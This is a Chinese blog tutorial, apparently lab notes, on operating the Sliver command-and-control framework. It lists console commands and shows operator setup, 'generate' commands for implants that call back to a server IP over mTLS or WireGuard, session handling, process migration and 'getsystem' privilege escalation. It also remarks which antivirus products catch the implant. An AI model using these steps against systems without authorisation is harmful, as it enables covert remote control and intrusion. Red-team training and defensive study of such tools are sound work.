码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • sliver


    https://github.com/BishopFox/sliver
    https://github.com/BishopFox/sliver/wiki/Compile-From-Source
    https://www.youtube.com/watch?v=3R6WKUgN0K4

    运行sliver

    在这里插入图片描述

    命令参数

    在这里插入图片描述

    Commands:
    =========
      clear       清除屏幕
      exit        退出shell
      help        帮助
      monitor     监视器
      wg-config   生成新的WireGuard配置
      wg-portfwd  列出WireGuard端口
      wg-socks    列出监听WireGuard服务器
    
    Generic:
    ========
      aliases           列出当前别名
      armory            自动下载并安装扩展模块/别名
      background        后台活动会话
      beacons           信标管理
      builders          列出外部构建器
      canaries          列出以前生成的canaries
      cursed            谷歌浏览器开发者工具包?
      dns               启动DNS监听
      env               列出环境变量
      generate          生成二进制文件
      hosts             管理主机数据库
      http              启动http监听
      https             启动https监听
      implants          列出生成的马
      jobs              控制器
      licenses          开源许可
      loot              管理服务器商店
      mtls              启动mTLS监听
      prelude-operator  管理与Prelude操作员的连接?
      profiles          列出现有配置文件
      reaction          管理对事件的自动反应
      regenerate        重新生成注入?
      sessions          会话管理
      settings          管理客户端设置
      stage-listener    启动分段监听程序
      tasks             信标任务管理
      update            检查更新
      use               切换活动会话或信标
      version           显示版本信息
      websites          Host static content (used with HTTP C2)
      wg                启动WireGuard监听
    
    Multiplayer:
    ============
      kick-operator  踢人
      multiplayer    开启多人模式
      new-operator   创建新的用户配置文件
      operators      管理员设置
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50

    如何使用

    开启多人模式
    创建用户配置文件

    new-operator --name test --lhost ServerIP
    
    • 1
    [server] sliver > new-operator --name test --lhost 172.16.89.149
    
    [*] Generating new client certificate, please wait ...
    [*] Saved new client config to: /home/sliver/test_172.16.89.149.cfg
    
    • 1
    • 2
    • 3
    • 4

    server默认会监听一个端口31337,可以修改掉~/.sliver/configs/server.json
    在这里插入图片描述

    下载对应客户端,导入server生成的配置文件,连接

    ./sliver-client_macos import test_172.16.89.149.cfg
    2022/11/03 10:40:59 Saved new client config to: /Users/wp_mac/.sliver-client/configs/test_172.16.89.149.cfg
    
    • 1
    • 2

    在这里插入图片描述

    生成implant

    支持mac、windows、linux
    implant支持mtls、WireGuard、http/https、dns、namedpipe、tcp等协议的上线

    generate --mtls <Server IP> --save ./test.exe --os Windows
    generate --wg 172.16.89.149:8088 --save ./web.elf --os linux
    
    • 1
    • 2

    在这里插入图片描述
    启动mtls监听

    在这里插入图片描述

    defender直接删了
    在这里插入图片描述

    关闭defender后使用360没有检测出威胁
    在这里插入图片描述

    在这里插入图片描述

    弹回会话有ip,端口,主机名,系统架构,时间信息
    在这里插入图片描述

    使用session查看所有会话信息
    在这里插入图片描述

    操作会话

    sessions -i sessionID 进入会话
    sessions -k sessionID 杀死会话
    
    • 1
    • 2

    在这里插入图片描述

    其它

    operators 查看用户在线
    implants 查看生成的马

    在这里插入图片描述

    ps 列出进程
    migrate 迁移进程

    在这里插入图片描述


    getsystem 提权

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-K5FPWg53-1667456424972)(https://cdn.nlark.com/yuque/0/2022/png/27875807/1667445588937-dc44bd7c-0c77-4578-914b-7e8592813057.png#clientId=ua055514d-0a03-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=740&id=ude68862a&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1628&origin &originalType=binary&ratio=1&rotation=0&showTitle=false&size=545809&status=done&style=none&taskId=u235e764f-c790-443a-8b18-12e6687fd88&title=& .0908807171284)]

  • 相关阅读:
    365天深度学习训练营-第3周:天气识别
    如何实现双击弹出提示并刷新图片列表的功能?
    python3.11版本pip install ddddocr调用时报错got an unexpected keyword argument ‘det‘ 解决
    框架 Wrapper 条件构造器 2022-8-3 接昨天的
    计算整数列表中的中位数
    k8s自定义Endpoint实现内部pod访问外部应用
    unity 浏览器插件【embedded browser(原zfbrowser)】简单教程,使unity支持web h5页面,附软件下载链接
    让我看看谁还不会现在火爆的Spring Cloud,赶紧跟着大佬学起来
    C/C++基础
    【Java 进阶篇】使用 JDBC 更新数据详解
  • 原文地址:https://blog.csdn.net/qq_38626043/article/details/127669368
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号